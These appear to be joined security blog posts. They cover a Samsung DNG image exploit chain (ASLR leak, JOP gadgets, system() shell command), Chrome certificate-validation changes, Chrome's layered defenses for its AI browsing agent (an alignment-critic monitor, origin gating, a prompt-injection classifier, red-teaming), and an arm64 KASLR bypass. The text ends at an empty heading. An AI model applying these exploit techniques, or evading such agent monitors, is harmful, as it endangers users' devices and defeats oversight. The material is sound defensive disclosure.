QuramDngOpcodeMapTable vtable offset    0x2dcd30     0x2dce50
Then the following MapTable substitution table would be constructed (omitting values that don’t matter and can map to whatever):
index : value
0x0cf0 : 0x0d30
0x0e10 : 0x0e50
0x1cf0 : 0x1d30
0x1e10 : 0x1e50
0x2cf0 : 0x2d30
0x2e10 : 0x2e50
0x3cf0 : 0x3d30
0x3e10 : 0x3e50
0x4cf0 : 0x4d30
0x4e10 : 0x4e50
0x5cf0 : 0x5d30
0x5e10 : 0x5e50
0x6cf0 : 0x6d30
0x6e10 : 0x6e50
0x7cf0 : 0x7d30
0x7e10 : 0x7e50
0x8cf0 : 0x8d30
0x8e10 : 0x8e50
0x9cf0 : 0x9d30
0x9e10 : 0x9e50
0xacf0 : 0xad30
0xae10 : 0xae50
0xbcf0 : 0xbd30
0xbe10 : 0xbe50
0xccf0 : 0xcd30
0xce10 : 0xce50
0xdcf0 : 0xdd30
0xde10 : 0xde50
0xecf0 : 0xed30
0xee10 : 0xee50
0xfcf0 : 0xfd30
0xfe10 : 0xfe50
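Such a table can be generated mechanically from the per-version vtable offsets. The sketch below reproduces the example entries above (the offsets are the illustrative values from the table, not real ones):

```python
# Generating the substitution table from per-version vtable offsets.
# Offsets are the illustrative example values, not real ones.
VTABLE_PAIRS = [
    (0x2dccf0, 0x2dcd30),  # version x: TrimBounds vtable -> MapTable vtable
    (0x2dce10, 0x2dce50),  # version y: TrimBounds vtable -> MapTable vtable
]

table = {i: i for i in range(0x10000)}  # entries that don't matter map to themselves
for trim, mapt in VTABLE_PAIRS:
    # ASLR is page granular, so the low 12 bits are fixed; cover every
    # possible value of the 4 bits above the page offset.
    for nibble in range(16):
        table[(nibble << 12) | (trim & 0xfff)] = (nibble << 12) | (mapt & 0xfff)

print(hex(table[0xecf0]))  # -> 0xed30, matching the exploit's table
```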
Using the previously described arbitrary write primitive, the exploit also corrupts various fields of the TrimBounds object to transform it into a functional bogus MapTable object. Note that a regular MapTable opcode object is bigger than a TrimBounds opcode and would hence also land in a different scudo heap class in normal circumstances. Obviously, the library is unaware and will just read opcode arguments out of bounds in this case.
The constructed bogus MapTable opcode object looks like this:
(figure: the vtable pointer of the neighboring TrimBounds opcode is interpreted here as the pointer to the MapTable’s substitution table)
The whole goal of this construction is to have the vtable of another opcode object as the pointer for the MapTable substitution table. If we zero out the memory this MapTable will be applied to beforehand, this will result in a read of two bytes from the TrimBounds vtable, i.e. a leak.
Using the above technique, we can leak arbitrary values at offsets from the TrimBounds vtable. We demonstrated this for offset 0, but the same idea can be applied for other offsets (up to 65536, the maximum index into the substitution table).
Say you want to leak a pointer at offset 0x1f8 from the TrimBounds vtable. This can be achieved in the following way:
But again, the exploit needs to support different library versions. These different library versions have pointers to leak at different offsets from the vtable. But based on the first leak at offset 0, we can “calculate” the right offsets to leak using another MapTable operation.
In summary the process goes as follows (illustrated below):
Corrupt a TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.
Have the bogus MapTable opcode process an area of all zeros. The substituted values will be the lower 2 bytes of the first vtable entry (which is the address of QuramDngOpcode::~QuramDngOpcode()). The top nibble will depend on the ASLR slide, and the lower 3 nibbles will be version dependent.
Using MapTable opcodes with well prepared substitution tables (supporting different ASLR slides and library versions), substitute those values to the offset between the TrimBounds vtable and the address of the pointer to leak.
Similar to step 1, corrupt another TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.
The bogus MapTable will now substitute the offsets from the vtable into their respective values, effectively writing a leaked pointer into memory.
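The leak dance can be modeled abstractly. Memory here is a dict of 16-bit words, a MapTable lookup is simplified to reading the word at table_base + index, and every address and value below is hypothetical:

```python
# Abstract model of the leak dance; all addresses/values are hypothetical.
memory = {}
TRIMBOUNDS_VTABLE = 0x70000000              # unknown to the attacker under ASLR
memory[TRIMBOUNDS_VTABLE + 0x000] = 0xed94  # low 16 bits of the destructor pointer
memory[TRIMBOUNDS_VTABLE + 0x1f8] = 0x33a8  # low 16 bits of the pointer to leak

def bogus_maptable(table_base, values):
    """A bogus MapTable whose substitution table points at the vtable."""
    return [memory.get(table_base + v, v) for v in values]

# Step 2: apply the bogus MapTable to zeroed memory -> leaks word at vtable+0
leaked = bogus_maptable(TRIMBOUNDS_VTABLE, [0])[0]

# Step 3: a prepared, regular MapTable turns the leak into the offset to read
prepared = {0xed94: 0x1f8}                  # one entry per version/slide in reality
offset = prepared[leaked]

# Step 4: a second bogus MapTable substitutes the offset into the value there
pointer_low = bogus_maptable(TRIMBOUNDS_VTABLE, [offset])[0]
print(hex(pointer_low))  # -> 0x33a8
```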
The memory used for preparing these pointers is at offset 0xf000 from the raw pixel buffer, which contains the last series of 1040 “unknown” opcodes. This memory will become the JOP chain.
The leaked pointers are mostly pointers to functions inside libimagecodec.quram.so, as well as the value of libc’s __system_property_get, which is located in the GOT. Conveniently, the .got segment is located after the TrimBounds vtable, within a 65536-byte offset.
Preparing the payload
By using more MapTable operations, we can change the leaked pointers to the JOP gadget addresses we are interested in. The leaked libc pointer is changed to the address of system.
This is an overview of the leaked pointers and what they are changed to:
A long shell command is also prepared at offset 0x10000 from the raw pixel buffer, which also falls in that 1040 Unknown opcodes region.
We end up with:
a JOP chain prepared at 0xf000. Note that it is preceded by one of the 1040 Unknown opcodes with opcode ID 23 (0x17)
a shell command at offset 0x10000. Note again how it is within the region of the Unknown opcodes
Triggering the JOP chain
Similar to our initial corruption, we increment values between 0x2800 and 0x6400 with 1, but this time at offset 0x22 within the objects, using DeltaPerColumn opcodes. The opcode objects there have been executed by now, so this does not affect them. However, the QuramDngImage is also there and offset 0x20 in the QuramDngImage is a pointer to the raw pixel buffer. By adding 1 to offset 0x22, we basically shift the raw pixel buffer pointer with 0x10000 bytes, pointing it right at the shell command.
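The pointer shift works because of little-endian byte order: byte 2 of an 8-byte pointer is its 0x10000s place. The object layout matches the offsets above; the address below is a hypothetical value:

```python
import struct

# Adding 1 at byte offset 0x22 shifts the little-endian 8-byte pointer
# stored at offset 0x20 by 0x10000. The address is hypothetical.
image = bytearray(0x30)
struct.pack_into("<Q", image, 0x20, 0x712345000000)  # raw pixel buffer pointer

image[0x22] = (image[0x22] + 1) & 0xff               # the DeltaPerColumn increment
shifted, = struct.unpack_from("<Q", image, 0x20)
print(hex(shifted - 0x712345000000))  # -> 0x10000
```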
Finally, the DNG decoder will execute that last series of 1040 “unknown” opcodes. Offset 0xf000 - where we prepared our JOP chain - falls nicely on the boundary of one of those opcodes, so it will be executed as another opcode.
QuramDngOpcode::aboutToApply reads the bogus vtable pointer at raw pixel buffer offset 0xf000 and calls the fourth function in it, which will be qpng_read_data.
.got:00000000002E33A8  qpng_read_data_ptr  DCQ qpng_read_data  ; bogus vtable entry that will be called
When qpng_read_data gets called, x0 will point to the opcode, as it is a method call. x1 points to the decoder, but is not important for the JOP chain. x2 is not specifically set up for this function call, but it still points to the QuramDngImage from QuramDngOpcodeList::doApply higher up the stack (it has not been clobbered). x2 pointing to the QuramDngImage is important for the JOP chain.
qpng_read_data will move x0 into x19 and call the next gadget, __ink_jpeg_enc_process_image_data+64.
We jump into the middle of __ink_jpeg_enc_process_image_data, which adds 0x20 to the QuramDngImage pointer, making x1 point at the address that contains the raw pixel buffer pointer:
The final gadget, __ink_jpeg_enc_process_image+64, copies the raw pixel buffer pointer into x0 and calls system. The raw pixel buffer pointer was corrupted before the JOP chain to point at the shell command, resulting in a system(<shell_command>) call.
__ink_jpeg_enc_process_image+64:
0000000000161664  LDR X8, [X19,#0x928]   ; x19: address of shell command
                                         ; x8: system
0000000000161668  ADD X1, X20, #0x20
000000000016166C  MOV X0, X19            ; x0: address of shell command
0000000000161670  BLR X8                 ; system
Below is a summary of the sequence of gadgets and their purpose:
Gadget: qpng_read_data
Relevant instructions: MOV X19, X0 ; MOV X20, X2
Purpose: Copy the opcode address into x19 and the QuramDngImage address into x20

Gadget: __ink_jpeg_enc_process_image_data+64
Relevant instructions: ADD X1, X20, #0x20
Purpose: Have x1 point at QuramDngImage+0x20 (which contains the raw pixel buffer pointer)

Gadget: QURAMWINK_Read_IO2+124
Relevant instructions: LDR X1, [X1]
Purpose: Dereference x1, so it contains the raw pixel buffer pointer

Gadget: qpng_check_IHDR+624 → qpng_error
Relevant instructions: MOV X19, X1
Purpose: Copy the raw pixel buffer pointer from x1 into x19

Gadget: __ink_jpeg_enc_process_image+64
Relevant instructions: LDR X8, [X19,#0x928] ; MOV X0, X19 ; BLR X8
Purpose: Copy the raw pixel buffer pointer from x19 into x0 and call system; the pointer was corrupted before the JOP chain to point at the shell command
The executed shell command performs several actions. It searches through all WhatsApp images for itself (using a unique string).
It unzips b.so from itself into /data/data/com.samsung.ipservice/files/b.so; the DNG file is effectively a polyglot of a DNG and a ZIP file.
Note that only the com.samsung.ipservice process is allowed to write here, which confirms this is the targeted process.
The second-to-last command contains the following serviceflag update (URL-decoded): UPDATE files SET serviceflag=serviceflag|66304. That value (66304, i.e. 0x10300) is a flag bitmask that sets the IPService, FaceService and StoryService flags in com.samsung.cmh’s files table. The different services use these flags to track which files they still need to process (flag bit set to 0) and which they have already processed (flag bit set to 1). The attackers’ likely objective here is to prevent these services from reparsing the image in the future.
Finally it runs b.so, the agent.
Fix
Curiously, this issue was silently fixed in Samsung’s April 2025 updates. In September 2025, a CVE was assigned (CVE-2025-21042) by Samsung and the security bulletin was updated. Note that not all supported Samsung devices receive monthly security updates; some devices are on a quarterly or biannual security update schedule, which means they might have received the fix at a later date. On December 11, 2025, Samsung told us the following: "patches for SVE-2025-1959 have been deployed to all devices supported by Security Update, without exception."
The fixed function now looks like below (simplified). The comparison against image_number_of_planes is the newly added check:
...
do {
    ... // Add delta to the value in the raw pixel buffer at the offset corresponding to plane `current_plane`
    current_plane++;
} while (current_plane < opcode_last_plane
         && current_plane < image_number_of_planes);  // added check
...
}
As we can see from the fix:
The opcode_last_plane is now calculated correctly.
Before dereferencing the raw pixel buffer, a check is performed that the current_plane is within the number of planes of the image.
Mitigations
Except for some ASLR bypassing tricks and a little bit of JOP work, no mitigations posed a significant hurdle for the attackers:
No control flow integrity mitigations, like PAC or BTI, are compiled into the Quram library. This allowed the attackers to use arbitrary addresses as JOP gadgets and construct a bogus vtable.
The “hardened” scudo allocator wasn’t an obstacle either. The heap spraying primitives (more or less inherent to the DNG format) are quite powerful and allow for a highly predictable heap layout, even in the presence of scudo’s randomization strategy. The absence of the quarantine feature is also convenient for deterministically reclaiming the spot of the stage 2 image.
MTE would likely have prevented both:
the initial vulnerability trigger to corrupt the image dimensions
the hundreds of subsequent out of bounds MapTable and DeltaPerColumn operations
preventing reliable exploitation of this vulnerability, at least with the current exploit strategy.
Conclusion
This case illustrates how certain image formats provide strong primitives out of the box for turning a single memory corruption bug into interactionless ASLR bypasses and remote code execution. By corrupting the bounds of the pixel buffer using the bug, the rest of the exploit could be performed by using the “weird machine” that the DNG specification and its implementation provide.
The bug exploited in this case is quite shallow and could have been found manually or through fuzzing. As Project Zero’s Reporting Transparency illustrates, several other vulnerabilities in the same component have been discovered.
These types of exploits do not need to be part of long and complex exploit chains to achieve something useful for attackers. By finding ways to reach the right attack surface and using a single vulnerability, attackers are able to access all the images and videos in an Android device’s media store, which is a very interesting capability for spyware vendors.
I would like to thank everyone who contributed to this analysis:
Meta for the initial leads
Brendon Tiszka of Google Project Zero for the research on how the com.samsung.ipservice attack surface can be reached, and for the follow-up research he performed into the Quram library, leading to several more discoveries.
Clement Lecigne of Google Threat Intelligence Group for assisting in the analysis
Secure connections are the backbone of the modern web, but a certificate is only as trustworthy as the validation process and issuance practices behind it. Recently, the Chrome Root Program and the CA/Browser Forum have taken decisive steps toward a more secure internet by adopting new security requirements for HTTPS certificate issuers.
These initiatives, driven by Ballots SC-080, SC-090, and SC-091, will sunset 11 legacy methods for Domain Control Validation. By retiring these outdated practices, which rely on weaker verification signals like physical mail, phone calls, or emails, we are closing potential loopholes for attackers and pushing the ecosystem toward automated, cryptographically verifiable security.
To allow affected website operators to transition smoothly, the deprecation will be phased in, with its full security value realized by March 2028.
This effort is a key part of our public roadmap, “Moving Forward, Together,” launched in 2022. Our vision is to improve security by modernizing infrastructure and promoting agility through automation. While "Moving Forward, Together" sets the aspirational direction, the recent updates to the TLS Baseline Requirements turn that vision into policy. This builds on our momentum from earlier this year, including the successful advocacy for the adoption of other security enhancing initiatives as industry-wide standards.
What’s Domain Control Validation?
Domain Control Validation is a security-critical process designed to ensure certificates are only issued to the legitimate domain operator. This prevents unauthorized entities from obtaining a certificate for a domain they do not control. Without this check, an attacker could obtain a valid certificate for a legitimate website and use it to impersonate that site or intercept web traffic.
Before issuing a certificate, a Certification Authority (CA) must verify that the requestor legitimately controls the domain. Most modern validation relies on “challenge-response” mechanisms, for example, a CA might provide a random value for the requestor to place in a specific location, like a DNS TXT record, which the CA then verifies.
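A challenge-response DNS validation can be sketched roughly along the lines of ACME's dns-01 flow. This is illustrative only: the key-authorization format and thumbprint are assumptions, not a spec-accurate client:

```python
import base64
import hashlib
import secrets

# Rough sketch of a DNS challenge-response validation, loosely modeled
# on ACME's dns-01 flow. The key-authorization format is an assumption.

def make_challenge():
    """CA side: random value handed to the certificate requestor."""
    return secrets.token_urlsafe(32)

def expected_txt_value(token, account_thumbprint):
    key_auth = f"{token}.{account_thumbprint}"
    digest = hashlib.sha256(key_auth.encode()).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode()

def validate(token, account_thumbprint, fetched_txt_records):
    """CA side: does any fetched TXT record carry the expected value?"""
    return expected_txt_value(token, account_thumbprint) in fetched_txt_records

token = make_challenge()
value = expected_txt_value(token, "example-thumbprint")
print(validate(token, "example-thumbprint", [value, "unrelated"]))  # -> True
```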
Historically, other methods validated control through indirect means, such as looking up contact information in WHOIS records or sending an email to a domain contact. These methods have been proven vulnerable (example) and the recent efforts retire these weaker checks in favor of robust, automated alternatives.
Raising the floor of security
The recently passed CA/Browser Forum Server Certificate Working Group Ballots introduce a phased sunset of the following Domain Control Validation methods. Alternative existing methods offer stronger security assurances against attackers trying to obtain fraudulent certificates – and the alternative methods are getting stronger over time, too.
For everyday users, these changes are invisible, and that’s the point. But behind the scenes, they make it harder for attackers to trick a CA into issuing a certificate for a domain they don’t control. This reduces the risk that stale or indirect signals (like outdated WHOIS data, complex phone and email ecosystems, or inherited infrastructure) can be abused. These changes push the ecosystem toward standardized (e.g., ACME), modern, and auditable Domain Control Validation methods. They increase agility and resilience by encouraging site owners to transition to modern Domain Control Validation methods, creating opportunities for faster and more efficient certificate lifecycle management through automation.
These initiatives remove weak links in how trust is established on the internet. That leads to a safer browsing experience for everyone, not just users of a single browser, platform, or website.
Chrome has been advancing the web’s security for well over 15 years, and we’re committed to meeting new challenges and opportunities with AI. Billions of people trust Chrome to keep them safe by default, and this is a responsibility we take seriously. Following the recent launch of Gemini in Chrome and the preview of agentic capabilities, we want to share our approach and some new innovations to improve the safety of agentic browsing.
The primary new threat facing all agentic browsers is indirect prompt injection. It can appear in malicious sites, third-party content in iframes, or from user-generated content like user reviews, and can cause the agent to take unwanted actions such as initiating financial transactions or exfiltrating sensitive data. Given this open challenge, we are investing in a layered defense that includes both deterministic and probabilistic defenses to make it difficult and costly for attackers to cause harm.
Designing safe agentic browsing for Chrome has involved deep collaboration with security experts across Google. We built on Gemini's existing protections and agent security principles and have implemented several new layers for Chrome.
We’re introducing a user alignment critic where the agent’s actions are vetted by a separate model that is isolated from untrusted content. We’re also extending Chrome’s origin-isolation capabilities to constrain what origins the agent can interact with, to just those that are relevant to the task. Our layered defense also includes user confirmations for critical steps, real-time detection of threats, and red-teaming and response. We’ll step through these layers below.
Checking agent outputs with User Alignment Critic
The main planning model for Gemini uses page content shared in Chrome to decide what action to take next. Exposure to untrusted web content means it is inherently vulnerable to indirect prompt injection. We use techniques like spotlighting that direct the model to strongly prefer following user and system instructions over what’s on the page, and we’ve upstreamed known attacks to train the Gemini model to avoid falling for them.
To further bolster model alignment beyond spotlighting, we’re introducing the User Alignment Critic — a separate model built with Gemini that acts as a high-trust system component. This architecture is inspired partially by the dual-LLM pattern as well as CaMeL research from Google DeepMind.
A flow chart that depicts the User Alignment Critic: a trusted component that vets each action before it reaches the browser.
The User Alignment Critic runs after the planning is complete to double-check each proposed action. Its primary focus is task alignment: determining whether the proposed action serves the user’s stated goal. If the action is misaligned, the Alignment Critic will veto it. This component is architected to see only metadata about the proposed action and not any unfiltered untrustworthy web content, thus ensuring it cannot be poisoned directly from the web. It has less context, but it also has a simpler job — just approve or reject an action.
This is a powerful, extra layer of defense against both goal-hijacking and data exfiltration within the action step. When an action is rejected, the Critic provides feedback to the planning model to re-formulate its plan, and the planner can return control to the user if there are repeated failures.
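A toy model of this pattern is sketched below: the critic sees only action metadata, never raw page content, and can only approve or reject. The rule used is a stand-in for the real Gemini-based model, and all names are hypothetical:

```python
from dataclasses import dataclass

# Toy model of the critic pattern; the rule is a stand-in for the real
# Gemini-based model, and all names are hypothetical.

@dataclass
class ProposedAction:
    kind: str           # e.g. "click", "type", "navigate"
    target_origin: str
    summary: str        # short metadata string, not page content

def alignment_critic(action, user_goal):
    """Approve only actions whose metadata plausibly serves the goal."""
    if action.kind == "navigate" and action.target_origin not in user_goal:
        return False
    return True

def run_step(proposals, user_goal):
    """Try planner proposals in order; hand control back on repeated vetoes."""
    for action in proposals:
        if alignment_critic(action, user_goal):
            return ("execute", action)
    return ("return_control_to_user", None)

goal = "buy running shoes on shop.example"
hijacked = ProposedAction("navigate", "evil.example", "open evil.example")
aligned = ProposedAction("click", "shop.example", "add shoes to cart")
print(run_step([hijacked, aligned], goal)[0])  # -> execute
```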
Enforcing stronger security boundaries with Origin Sets
Site Isolation and the same-origin policy are fundamental boundaries in Chrome’s security model and we’re carrying forward these concepts into the agentic world. By their nature, agents must operate across websites (e.g. collecting ingredients on one site and filling a shopping cart on another). But if an unrestricted agent is compromised and can interact with arbitrary sites, it can create what is effectively a Site Isolation bypass. That can have a severe impact when the agent operates on a local browser like Chrome, with logged-in sites vulnerable to data exfiltration. To address this, we’re extending those principles with Agent Origin Sets. Our design architecturally limits the agent to only access data from origins that are related to the task at hand, or data that the user has chosen to share with the agent. This prevents a compromised agent from acting arbitrarily on unrelated origins.
For each task on the web, a trustworthy gating function decides which origins proposed by the planner are relevant to the task. The design is to separate these into two sets, tracked for each session:
Read-only origins are those from which Gemini is permitted to consume content. If an iframe’s origin isn’t on the list, the model will not see that content.
Read-writable origins are those on which the agent is allowed to actuate (e.g., click, type) in addition to reading from.
This delineation enforces that only data from a limited set of origins is available to the agent, and this data can only be passed on to the writable origins. This bounds the threat vector of cross-origin data leaks. This also gives the browser the ability to enforce some of that separation, such as by not even sending to the model data that is outside the readable set. This reduces the model’s exposure to unnecessary cross-site data. Like the Alignment Critic, the gating functions that calculate these origin sets are not exposed to untrusted web content. The planner can also use context from pages the user explicitly shared in that session, but it cannot add new origins without the gating function’s approval. Outside of web origins, the planning model may ingest other non-web content such as from tool calls, so we also delineate those into read-vs-write calls and similarly check that those calls are appropriate for the task.
Iframes from origins that aren’t related to the user’s task are not shown to the model.
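The two-set gating can be sketched as follows. In reality a trusted model decides which origins are relevant to the task; here the grants are simply explicit:

```python
# Minimal sketch of the two-set origin gating. In reality a trusted
# model populates the sets; here the grants are explicit.

class AgentOriginSets:
    def __init__(self):
        self.readable = set()
        self.writable = set()

    def grant_read(self, origin):
        self.readable.add(origin)

    def grant_write(self, origin):
        self.readable.add(origin)   # writable implies readable
        self.writable.add(origin)

    def can_show_to_model(self, origin):
        """Content (e.g. an iframe) outside the readable set never reaches the model."""
        return origin in self.readable

    def can_actuate(self, origin):
        return origin in self.writable

sets = AgentOriginSets()
sets.grant_read("https://recipes.example")      # collect ingredients here
sets.grant_write("https://groceries.example")   # fill the shopping cart here

print(sets.can_show_to_model("https://ads.example"))   # -> False
print(sets.can_actuate("https://recipes.example"))     # -> False (read-only)
```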
Page navigations can happen in several ways: If the planner decides to navigate to a new origin that isn’t yet in the readable set, that origin is checked for relevancy by a variant of the User Alignment critic before Chrome adds it and starts the navigation. And since model-generated URLs could exfiltrate private information, we have a deterministic check to restrict them to known, public URLs. If a page in Chrome navigates on its own to a new origin, it’ll get vetted by the same critic.
Getting the balance right on the first iteration is hard without seeing how users’ tasks interact with these guardrails. We’ve initially implemented a simpler version of origin gating that tracks only the read-writable set. We will tune the gating functions and other aspects of this system to reduce unnecessary friction while improving security. We think this architecture will provide a powerful security primitive that can be audited and reasoned about within the client, as it provides guardrails against cross-origin sensitive data exfiltration and unwanted actions.
Transparency and control for sensitive actions
We designed the agentic capabilities in Chrome to give the user both transparency and control when they need it most. As the agent works in a tab, it details each step in a work log, allowing the user to observe the agent's actions as they happen. The user can pause to take over or stop a task at any time.
This transparency is paired with several layers of deterministic and model-based checks to trigger user confirmations before the agent takes an impactful action. These serve as guardrails against both model mistakes and adversarial input by putting the user in the loop at key moments.
First, the agent will require a user confirmation before it navigates to certain sensitive sites, such as those dealing with banking transactions or personal medical information. This is based on a deterministic check against a list of sensitive sites. Second, it’ll confirm before allowing Chrome to sign-in to a site via Google Password Manager – the model does not have direct access to stored passwords. Lastly, before any sensitive web actions like completing a purchase or payment, sending messages, or other consequential actions, the agent will try to pause and either get permission from the user before proceeding or ask the user to complete the next step. Like our other safety classifiers, we’re constantly working to improve the accuracy to catch edge cases and grey areas.
Illustrative example: when the agent gets to a payment page, it stops and asks the user to complete the final step.
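A minimal sketch of the deterministic gate described above; the host list and action kinds are invented placeholders:

```python
# Sketch of the deterministic sensitive-action gate. The host list and
# action kinds are invented placeholders.
SENSITIVE_HOSTS = {"bank.example", "health.example"}
ALWAYS_CONFIRM = {"purchase", "payment", "send_message", "password_signin"}

def requires_confirmation(kind, detail):
    if kind == "navigate":
        return detail in SENSITIVE_HOSTS   # deterministic list check
    return kind in ALWAYS_CONFIRM          # always pause for consequential acts

print(requires_confirmation("navigate", "bank.example"))    # -> True
print(requires_confirmation("navigate", "recipes.example")) # -> False
```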
Detecting “social engineering” of agents
In addition to the structural defenses of alignment checks, origin gating, and confirmations, we have several processes to detect and respond to threats. While the agent is active, it checks every page it sees for indirect prompt injection. This is in addition to Chrome’s real-time scanning with Safe Browsing and on-device AI that detect more traditional scams. This prompt-injection classifier runs in parallel to the planning model’s inference, and will prevent actions from being taken based on content that the classifier determined has intentionally targeted the model to do something unaligned with the user’s goal. While it cannot flag everything that might influence the model with malicious intent, it is a valuable layer in our defense-in-depth.
Continuous auditing, monitoring, response
To validate the security of this set of layered defenses, we’ve built automated red-teaming systems to generate malicious sandboxed sites that try to derail the agent in Chrome. We start with a set of diverse attacks crafted by security researchers, and expand on them using LLMs following a technique we adapted for browser agents. Our continuous testing prioritizes defenses against broad-reach vectors such as user-generated content on social media sites and content delivered via ads. We also prioritize attacks that could lead to lasting harm, such as financial transactions or the leaking of sensitive credentials. The attack success rates across these scenarios give immediate feedback on any engineering changes we make, so we can prevent regressions and target improvements. Chrome’s auto-update capabilities allow us to get fixes out to users very quickly, so we can stay ahead of attackers.
Collaborating across the community
We have a long-standing commitment to working with the broader security research community to advance security together, and this includes agentic safety. We’ve updated our Vulnerability Rewards Program (VRP) guidelines to clarify how external researchers can focus on agentic capabilities in Chrome. We want to hear about any serious vulnerabilities in this system, and will pay up to $20,000 for those that demonstrate breaches in the security boundaries. The full details are available in the VRP rules.
Looking forward
The upcoming introduction of agentic capabilities in Chrome brings new demands for browser security, and we've approached this challenge with the same rigor that has defined Chrome's security model from its inception. By extending some core principles like origin-isolation and layered defenses, and introducing a trusted-model architecture, we're building a secure foundation for Gemini’s agentic experiences in Chrome. This is an evolving space, and while we're proud of the initial protections we've implemented, we recognize that security for web agents is still an emerging domain. We remain committed to continuous innovation and collaboration with the security community to ensure Chrome users can explore this new era of the web safely.
I've recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive…but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping.
The Linux Linear Mapping
The linear mapping is a region in the kernel virtual address space that is a direct 1:1 unstructured representation of physical memory. Working with Jann, I learned how the kernel decides where to place this region in the virtual address space. To make it possible to analyze kernel internals on a rooted phone, Jann wrote a tool that calls tracing BPF's privileged BPF_FUNC_probe_read_kernel helper, which by design permits arbitrary kernel reads. The code for this is available here. The linear mapping virtual address for a given physical address is calculated by the following macro:
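The macro in question is arm64's __phys_to_virt(), which computes ((x) - PHYS_OFFSET) | PAGE_OFFSET, where PHYS_OFFSET is memstart_addr. A minimal model of that calculation (the constants assume the 4 KiB-page, 39-bit-VA configuration used on Pixel devices):

```python
# Model of arm64 __phys_to_virt() from arch/arm64/include/asm/memory.h.
# Constants assume VA_BITS=39 with 4 KiB pages, as on Pixel devices.
PAGE_OFFSET = 0xFFFF_FF80_0000_0000  # start of the linear map
PHYS_OFFSET = 0x8000_0000            # memstart_addr; static in practice

def phys_to_virt(phys: int) -> int:
    return (phys - PHYS_OFFSET) | PAGE_OFFSET

print(hex(phys_to_virt(0x8001_0000)))  # Pixel kernel load address
```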
This value (0x80000000) doesn’t look particularly random. In fact, memstart_addr was theoretically randomized on every boot, but in practice this hasn’t happened for a while on arm64. As of commit 1db780bafa4c it’s no longer even theoretical – virtual address randomization of the linear map is no longer a supported feature in the arm64 Linux kernel.
The systemic issue is that memory can (theoretically) be hot-plugged in Linux and on Android because of CONFIG_MEMORY_HOTPLUG=y. This feature is enabled on Android due to its usage in VM memory sharing. When new memory is plugged into an already running system, it must be possible for the Linux kernel to address this new memory, including adding it onto the linear map. Android on arm64 uses a page size of 4 KiB and 3-level paging, which means virtual addresses in the kernel are limited to 39 bits, unlike typical x86-64 desktops, which use 4-level paging and have 48 bits of virtual address space (for kernel and userspace combined); the linear map has to fit within this space, further shrinking the area available for it. Given that the maximum amount of theoretical physical memory is far larger than the entire possible linear map region range, the kernel places the linear map at the lowest possible virtual address so it can theoretically be prepared to handle exorbitant (up to 256 GB) quantities of hypothetical future hot-plugged physical memory. While it is not technically necessary to choose between memory hot-plugging support and linear map randomization, the Linux kernel developers decided not to invest the engineering effort to implement memory hot-plugging in a way that preserves linear map randomization.
So we now know that PHYS_OFFSET will always be 0x80000000, and thus the phys_to_virt calculation becomes purely static – given any physical address, you can calculate the corresponding linear map virtual address as virt = (phys - 0x80000000) | 0xffffff8000000000 (for the 39-bit virtual address space configuration used on these devices).
Compounding this issue, it also happens that on Pixel phones, the bootloader decompresses the kernel itself at the same physical address every boot: 0x80010000.
This means that we can statically calculate a kernel virtual address for any kernel .data entry. Here’s an example of me computing that linear map address for the modprobe_path string in kernel .data on a Pixel 9:
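The original shows this computed on a live device; as an illustrative sketch (the modprobe_path offset below is a hypothetical value back-derived from the address given in the next paragraph, not read out of a real kernel image):

```python
KERNEL_PHYS_BASE = 0x8001_0000          # static Pixel kernel load address
PHYS_OFFSET = 0x8000_0000
PAGE_OFFSET = 0xFFFF_FF80_0000_0000

# Hypothetical offset of modprobe_path within the kernel image,
# back-derived to match the Pixel 9 address quoted in the text.
MODPROBE_PATH_OFFSET = 0x1FE_2398

phys = KERNEL_PHYS_BASE + MODPROBE_PATH_OFFSET
virt = (phys - PHYS_OFFSET) | PAGE_OFFSET
print(hex(virt))
```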
So modprobe_path will always be accessible at the kernel virtual address 0xffffff8001ff2398, in addition to its normal mapping, even with KASLR enabled. In practice, on Pixel devices you can derive a valid virtual address for a kernel symbol by calculating its offset and simply adding a hardcoded static kernel base address of 0xffffff8000010000. In short, instead of breaking the KASLR slide, it is possible to just use 0xffffff8000010000 as a kernel base instead.
The linear mapping memory is even mapped rw for any kernel .data regions. The only consolation that makes using this address slightly less effective than the traditional method of leaking the KASLR slide is that .text regions are not mapped executable - so an attacker cannot use this base for e.g. ROP gadgets or more generally PC control. But oftentimes, a Linux kernel attacker’s goal isn’t arbitrary code execution in kernel context anyway - arbitrary read-write is the more frequently desired primitive.
Impact on devices with kernel physical address randomization
Even on devices where the kernel location is randomized in the physical address space, linear mapping non-randomization still softens the kernel considerably to attempts at exploitation. This is particularly because techniques that involve spraying memory (either kernel structures or even userland mmap’s!) can land at predictable physical addresses - and those physical addresses are easily referenceable in kernel virtual address space through the linear map. That potentially gives an attacker a methodology for placing kernel data structures or even simply attacker-controlled userland memory at a known kernel virtual address. I created a simple program that allocated (via mmap and page fault) a substantial quantity (~5 GB) of physical memory on a Samsung S23, then used /proc/pagemap to create a list of which physical page frame numbers (pfns) were allocated. I ran this program 100 times (rebooting in between each time), then counted how often each pfn appeared across the 100 execution cycles. The set of pfns and their counts for how often they appeared were then converted into an image where each pfn is represented by a single pixel. The brighter the green of a pixel, the more often that page was attacker controlled, with a white pixel representing a pfn that was allocated every time. A black pixel represents a pfn that was never allocated - often because those pfn numbers are not mapped to physical memory or because they are used every time in a deterministic way. A big thank you to Jann Horn for developing the tool to create this image from the data that I collected.
This data exemplifies the non-homogenous reliability of pfn allocation to userland mappings, albeit on a device that was only just rebooted. There are ranges of pfns that are allocated quite reliably, and other ranges that are quite unreliable (but still occasionally used). For example, here’s a range of pfns surrounding one of the pages that was allocated 100 times in a row. I suspect this sample is representative of the practical reliability of this technique for placing desired data at a known kernel address for at least a newly rebooted device.
While reliability may suffer on a device that hasn’t rebooted in some time, it remains high enough to be inviting to real-world attackers. Being able to place arbitrarily readable and writable data at a known kernel virtual address is a powerful exploitation primitive as an attacker can much more easily forge kernel data structures or objects and, for example, emplace pointers to those objects in heap sprays attacking UAF issues.
The Prognosis
I reported these two separate issues – the lack of linear map randomization, and the kernel landing at a static physical address on Pixel – to the Linux kernel team and Google Pixel respectively. However, both of these issues are considered intended behavior. While Pixel may introduce randomized physical kernel load addresses at some later point as a feature, there are no immediate plans to resolve the lack of randomization of the Linux kernel’s linear map on arm64.
Conclusion
